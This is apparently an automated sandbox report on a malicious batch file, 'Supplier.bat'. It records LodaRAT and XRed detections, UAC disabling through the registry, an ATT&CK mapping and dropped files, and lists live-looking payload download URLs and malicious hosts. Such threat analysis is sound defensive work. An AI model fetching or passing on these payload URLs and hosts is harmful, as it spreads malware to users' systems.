Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006B40DA GetSystemTimeAsFileTime,__aulldiv,

46_2_006B40DA

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_0070C146 GetUserNameW,

46_2_0070C146

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006C2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

46_2_006C2C3C

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006AE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

46_2_006AE47B

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Windows\System32\reg.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Source: Amcache.hve.68.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.68.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.68.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: ._cache_DOCX.exe, 0000002E.00000002.2542653625.0000000001232000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.68.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\._cache_DOCX.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

Stealing of Sensitive Information

Yara detected LodaRAT

Source: Yara match

File source: Process Memory Space: ._cache_DOCX.exe PID: 6108, type: MEMORYSTR

Yara detected XRed

Source: Yara match	File source: 42.0.DOCX.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000000.1682512476.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.1789798838.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DOCX.exe PID: 9212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Synaptics.exe PID: 656, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX1FC6.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Downloads\DOCX.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: XVZBZS.exe, 00000041.00000002.1842372870.00000000004AE000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
Source: XVZBZS.exe, 00000041.00000002.1845467106.0000000004C93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81
Source: XVZBZS.exe	Binary or memory string: WIN_XP
Source: ._cache_DOCX.exe, 0000002E.00000002.2548488426.000000000438A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81=
Source: XVZBZS.exe	Binary or memory string: WIN_XPe
Source: XVZBZS.exe	Binary or memory string: WIN_VISTA
Source: XVZBZS.exe	Binary or memory string: WIN_7
Source: XVZBZS.exe	Binary or memory string: WIN_8

Source: Yara match

File source: Process Memory Space: ._cache_DOCX.exe PID: 6108, type: MEMORYSTR

Remote Access Functionality

Yara detected LodaRAT

Source: Yara match

File source: Process Memory Space: ._cache_DOCX.exe PID: 6108, type: MEMORYSTR

Yara detected XRed

Source: Yara match	File source: 42.0.DOCX.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000000.1682512476.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.1789798838.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DOCX.exe PID: 9212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Synaptics.exe PID: 656, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX1FC6.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Downloads\DOCX.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006C6675 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,	46_2_006C6675
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006E91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	46_2_006E91DC
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006E96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	46_2_006E96E2
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00436675 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,	60_2_00436675
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_004591DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	60_2_004591DC
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_004596E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	60_2_004596E2

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	522 Scripting	2 Valid Accounts	321 Windows Management Instrumentation	522 Scripting	1 Exploitation for Privilege Escalation	32 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	1 Replication Through Removable Media	3 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Peripheral Device Discovery	Remote Desktop Protocol	21 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	1 Extra Window Memory Injection	21 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Valid Accounts	1 Software Packing	NTDS	4 File and Directory Discovery	Distributed Component Object Model	Input Capture	34 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	21 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	158 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Process Injection	1 Extra Window Memory Injection	Cached Domain Credentials	671 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	22 Masquerading	DCSync	351 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	21 Registry Run Keys / Startup Folder	2 Valid Accounts	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	351 Virtualization/Sandbox Evasion	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	12 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Supplier.bat	10%	Virustotal		Browse
Supplier.bat	5%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	W2000M/Dldr.Agent.17651006
C:\Users\user\Documents\~$cache1	100%	Avira	TR/Dldr.Agent.SH
C:\Users\user\Documents\~$cache1	100%	Avira	W2000M/Dldr.Agent.17651006
C:\Users\user\AppData\Local\Temp\TGWEKK.vbs	100%	Avira	VBS/Runner.VPJI
C:\ProgramData\Synaptics\RCX1FC6.tmp	100%	Avira	TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\RCX1FC6.tmp	100%	Avira	W2000M/Dldr.Agent.17651006
C:\Users\user\Downloads\DOCX.exe	100%	Avira	TR/Dldr.Agent.SH
C:\Users\user\Downloads\DOCX.exe	100%	Avira	W2000M/Dldr.Agent.17651006
C:\Users\user\Desktop\._cache_DOCX.exe	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\Synaptics.exe	100%	Joe Sandbox ML
C:\Users\user\Documents\~$cache1	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\RCX1FC6.tmp	100%	Joe Sandbox ML
C:\Users\user\Downloads\DOCX.exe	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\RCX1FC6.tmp	92%	ReversingLabs	Win32.Virus.Napwhich
C:\ProgramData\Synaptics\Synaptics.exe	92%	ReversingLabs	Win32.Trojan.Synaptics
C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	42%	ReversingLabs	Win32.Trojan.Lisk
C:\Users\user\Desktop\._cache_DOCX.exe	42%	ReversingLabs	Win32.Trojan.Lisk
C:\Users\user\Documents\~$cache1	92%	ReversingLabs	Win32.Virus.Napwhich
C:\Users\user\Downloads\DOCX.exe	92%	ReversingLabs	Win32.Trojan.Synaptics

Source	Detection	Scanner	Label
https://paste.fo/raw/cdfd23f3b9ad	0%	Avira URL Cloud	safe
https://raw.githubuserc	0%	Avira URL Cloud	safe
http://paste.fo	0%	Avira URL Cloud	safe
https://paste.fo	0%	Avira URL Cloud	safe
http://xred.site50.net/syn/SSLLibrary.dl	100%	Avira URL Cloud	malware
http://xred.site50.net/syn/Synaptics.rar4	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
freedns.afraid.org	69.42.215.252	true	false	high
docs.google.com	216.58.206.46	true	false	high
raw.githubusercontent.com	185.199.111.133	true	false	high
www.google.com	142.250.186.164	true	false	high
drive.usercontent.google.com	142.250.185.193	true	false	high
paste.fo	172.67.144.225	true	true	unknown
xred.mooo.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip	false		high
https://paste.fo/raw/cdfd23f3b9ad	true	Avira URL Cloud: safe	unknown
xred.mooo.com	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://xred.site50.net/syn/Synaptics.rarZ	Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1	DOCX.exe.38.dr	false		high
https://contoso.com/License	powershell.exe, 00000009.00000002.1333368289.000001FB13539000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/uc?id=0BxsMXGfPIqD	Synaptics.exe, 00000032.00000002.2024268734.00000000007DC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/h	Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/f	Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/e	Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/	Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dl	DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://xred.site50.net/syn/Synaptics.rar4	DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://xred.site50.net/syn/SUpdate.iniZ	Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SUpdate.ini	DOCX.exe.38.dr	false		high
https://contoso.com/	powershell.exe, 00000009.00000002.1333368289.000001FB13539000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000009.00000002.1313399256.000001FB04C5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1333368289.000001FB133F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1333368289.000001FB13539000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000009.00000002.1313399256.000001FB04A00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16	Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://paste.fo	powershell.exe, 00000009.00000002.1313399256.000001FB049B2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://raw.githubuserc	Supplier.bat	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000009.00000002.1313399256.000001FB03381000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/dyg	Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=	DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/=	Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl$	DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.1313399256.000001FB04C5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1333368289.000001FB133F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1333368289.000001FB13539000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000009.00000002.1313399256.000001FB04A00000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000009.00000002.1313399256.000001FB04C04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000009.00000002.1313399256.000001FB04C04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000009.00000002.1313399256.000001FB03FB3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/d	Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/0	Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000009.00000002.1333368289.000001FB13539000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/download?id=0BxsM	Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:	Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000013.00000002.2549394485.000001C97948F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2024268734.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.68.dr	false		high
http://xred.site50.net/syn/Synaptics.rar	DOCX.exe.38.dr	false		high
http://ip-score.com/checkip/	._cache_DOCX.exe, 0000002E.00000002.2542653625.0000000001211000.00000004.00000020.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/7z2408-x64.exe&	Supplier.bat	false		high
https://github.com/Pester/Pester	powershell.exe, 00000009.00000002.1313399256.000001FB04C04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dll6	Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:	Synaptics.exe, 00000032.00000002.2026306685.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1	DOCX.exe.38.dr	false		high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1	DOCX.exe.38.dr	false		high
https://g.live.com/odclientsettings/Prod-C:	edb.log.19.dr, qmgr.db.19.dr	false		high
https://docs.google.com/V	Synaptics.exe, 00000032.00000002.2024268734.00000000007DC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/N0	Synaptics.exe, 00000032.00000002.2029741758.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paste.fo	powershell.exe, 00000009.00000002.1313399256.000001FB049AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1313399256.000001FB046D2000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978D	DOCX.exe, 0000002A.00000003.1703137796.0000000002290000.00000004.00001000.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2-C:	svchost.exe, 00000013.00000003.1365572830.000001C9791D0000.00000004.00000800.00020000.00000000.sdmp, edb.log.19.dr, qmgr.db.19.dr	false		high
https://aka.ms/pscore68	powershell.exe, 00000009.00000002.1313399256.000001FB03381000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/uc?id=0;	Synaptics.exe, 00000032.00000002.2048410215.000000000823E000.00000004.00000010.00020000.00000000.sdmp	false		high
https://docs.google.com/F	Synaptics.exe, 00000032.00000002.2024268734.00000000007DC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/E	Synaptics.exe, 00000032.00000002.2029741758.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dll	DOCX.exe.38.dr	false		high
https://oneget.org	powershell.exe, 00000009.00000002.1313399256.000001FB04A00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/0e	Synaptics.exe, 00000032.00000002.2029741758.000000000563A000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.144.225	paste.fo	United States	13335	CLOUDFLARENETUS	true
172.111.138.100	unknown	United States	3223	VOXILITYGB	true
185.199.111.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
216.58.206.46	docs.google.com	United States	15169	GOOGLEUS	false
69.42.215.252	freedns.afraid.org	United States	17048	AWKNET-LLCUS	false
142.250.185.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
192.168.2.10
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582345
Start date and time:	2024-12-30 11:35:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	71
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Supplier.bat
Detection:	MAL
Classification:	mal100.troj.expl.evad.winBAT@111/77@10/11
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 93 Number of non-executed functions: 284
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, sppsvc.exe, WerFault.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
